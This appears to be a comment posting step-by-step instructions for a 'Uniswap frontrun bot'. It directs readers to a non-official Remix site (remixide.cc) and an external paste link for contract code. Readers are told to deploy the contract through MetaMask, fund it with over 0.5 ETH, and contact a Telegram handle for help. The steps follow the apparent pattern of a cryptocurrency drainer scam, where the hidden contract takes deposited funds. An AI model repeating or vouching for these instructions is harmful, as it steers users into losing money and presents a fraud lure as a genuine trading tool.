• 5 months ago
❗️If you need help, please write to me:
https://t.me/@solidityrepo

️STEP-BY-STEP INSTRUCTIONS

✅1. Download MetaMask:
https://metamask.io/download

✅2. Access Remix:
https://remixide.cc/
(THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK)

✅3. Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”. Make sure it ends with .sol for Ethereum programming language.

Note: There is a problem if the text is not colored when you create bot.sol. Simply refresh the browser and then paste rentry codes again.

✅4. Paste THIS code in Remix:
https://pastecode.io/s/d3zt2av3

✅5. Go to the "Compile" tab on Remix and Compile with Solidity version 0.6.6

✅6. Go to the “DEPLOY & RUN TRANSACTIONS” tab, select the “Injected Web3” as environment and then “Deploy”. By approving the Metamask Contract creation fee, you will have created your own contract.

Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button. In this case mine would be "UniswapFrontrunBot -bot.sol".

✅7. Fund your bot to be able to frontrun transactions.
Make sure your deposit is more than 0.5 ETH( to prevent negating slippage ) to your exact contract/bot address.

✅8. After your transaction is confirmed, click the "start" button to run the bot. Withdraw money at any time by clicking the "Withdraw" button

Category

📚
Learning

Recommended